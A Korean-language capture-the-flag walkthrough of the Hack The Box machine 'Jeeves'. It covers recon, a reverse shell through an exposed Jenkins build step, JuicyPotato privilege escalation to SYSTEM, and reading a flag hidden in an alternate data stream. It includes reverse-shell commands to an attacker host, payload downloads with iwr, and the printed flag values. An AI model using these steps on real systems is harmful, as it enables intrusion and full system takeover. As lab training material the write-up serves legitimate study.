Jeeves

Proof of Concept

10.129.1.201

Nmap

PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
50000/tcp open  ibm-db2

---

Information Gathering

hosts 정보 수집

┌──(kali㉿kali)-[~/Jeeves]
└─$ nxc smb 10.129.1.201 --generate-hosts-file host
SMB         10.129.1.201    445    JEEVES           [*] Windows 10 Build 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
 
┌──(kali㉿kali)-[~/Jeeves]
└─$ cat host
10.129.1.201     JEEVES.Jeeves JEEVES

/etc/hosts 파일 설정

┌──(kali㉿kali)-[~/Jeeves]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
 
10.129.1.201     JEEVES.Jeeves JEEVES

---

Initial Access

50000 포트에서 웹 서비스가 동작 중인 것을 확인

┌──(kali㉿kali)-[~/Jeeves]
└─$ curl http://jeeves.jeeves:50000
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 404 Not Found</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /. Reason:
<pre>    Not Found</pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty:// 9.4.z-SNAPSHOT</a><hr/>
 
</body>
</html>

하위 디렉토리 탐색 결과, /askjeeves 발견

┌──(kali㉿kali)-[~/Jeeves]
└─$ feroxbuster -u http://jeeves.jeeves:50000/ -t 100 -s 200 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
 
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://jeeves.jeeves:50000/
 🚩  In-Scope Url          │ jeeves.jeeves
 🚀  Threads               │ 100
 📖  Wordlist              │ /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
 👌  Status Codes          │ [200]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
[>-------------------] - 2m     46720/2426006 3h      found:0       errors:117
200      GET       14l      558w    12077c http://jeeves.jeeves:50000/askjeeves/script
200      GET       14l      470w    10642c http://jeeves.jeeves:50000/askjeeves/computers/00/markOffline
200      GET       16l      469w    10786c http://jeeves.jeeves:50000/askjeeves/computers/00/index
200      GET        1l        2w      177c http://jeeves.jeeves:50000/askjeeves/people/api/xml
200      GET       82l      916w    12381c http://jeeves.jeeves:50000/askjeeves/people/api/index
200      GET        0l        0w        0c http://jeeves.jeeves:50000/askjeeves/columns/00/config
<SNIP>

http://jeeves.jeeves:50000/askjeeves 접속해서 [ Jenkins > New Item > Freestyle project > Build > Execute Windows batch command ]에 윈도우 리버스쉘 연결 명령어 입력 후 저장

리버스쉘 리스너 실행 후 “Build Now” 버튼 클릭 시 리버스 쉘이 연결됨

┌──(kali㉿kali)-[~/Jeeves]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.221] from (UNKNOWN) [10.129.1.201] 49676
 
PS C:\Users\Administrator\.jenkins\workspace\htb>

Read user.txt

PS C:\Users\kohsuke\Desktop> type user.txt
e3232272596fb47950d59c4cf1e7066a
PS C:\Users\kohsuke\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.1.201
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1
 
Tunnel adapter isatap..htb:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb

---

Privilege Escalation

현재 사용자에게 SeImpersonatePrivilege 권한이 활성화되어 있음을 확인

PS C:\Users\kohsuke\Desktop> whoami /priv
 
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

타겟 머신으로 JuicyPotato.exe와 nc64.exe 파일 업로드

PS C:\Users\kohsuke\Desktop> iwr -uri http://10.10.14.221:8000/JuicyPotato.exe -OutFile JuicyPotato.exe
PS C:\Users\kohsuke\Desktop> iwr -uri http://10.10.14.221:8000/nc64.exe -OutFile nc64.exe
PS C:\Users\kohsuke\Desktop> dir
 
 
    Directory: C:\Users\kohsuke\Desktop
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/21/2026   7:07 AM         347648 JuicyPotato.exe
-a----        2/21/2026   6:59 AM          45272 nc64.exe
-ar---        11/3/2017  11:22 PM             32 user.txt

리버스쉘 리스너 실행

┌──(kali㉿kali)-[~/Tools]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...

JuicyPotato 실행

PS C:\Users\kohsuke\Desktop> .\JuicyPotato.exe -l 1337 -p C:\Windows\system32\cmd.exe -a "/c C:\Users\kohsuke\Desktop\nc64.exe 10.10.14.221 9999 -e cmd" -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
 
[+] CreateProcessWithTokenW OK

System 권한으로 쉘 연결 성공

┌──(kali㉿kali)-[~/Tools]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.10.14.221] from (UNKNOWN) [10.129.1.201] 49705
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32>whoami
whoami
nt authority\system

---

Find root.txt

C:\Users\Administrator\Desktop 디렉토리에 root.txt 파일 대신 hm.txt 파일이 있으며, root.txt 파일이 숨겨져 있음

C:\Users\Administrator\Desktop>dir /a
dir /a
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1
 
 Directory of C:\Users\Administrator\Desktop
 
11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
11/03/2017  09:03 PM               282 desktop.ini
12/24/2017  02:51 AM                36 hm.txt
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               3 File(s)          1,115 bytes
               2 Dir(s)   2,655,916,032 bytes free
               
C:\Users\Administrator\Desktop>type hm.txt
type hm.txt
The flag is elsewhere.  Look deeper.

dir /R 로 탐색 결과 roo.txt 파일 발견

C:\Users\Administrator\Desktop>dir /R
dir /R
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Users\Administrator\Desktop

11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,655,854,592 bytes free

Read root.txt

C:\Users\Administrator\Desktop>more < hm.txt:root.txt:$DATA
more < hm.txt:root.txt:$DATA
afbc5bd4b615a60648cec41c6ac92530
 
C:\Users\Administrator\Desktop>ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.1.201
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1
 
Tunnel adapter isatap..htb:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb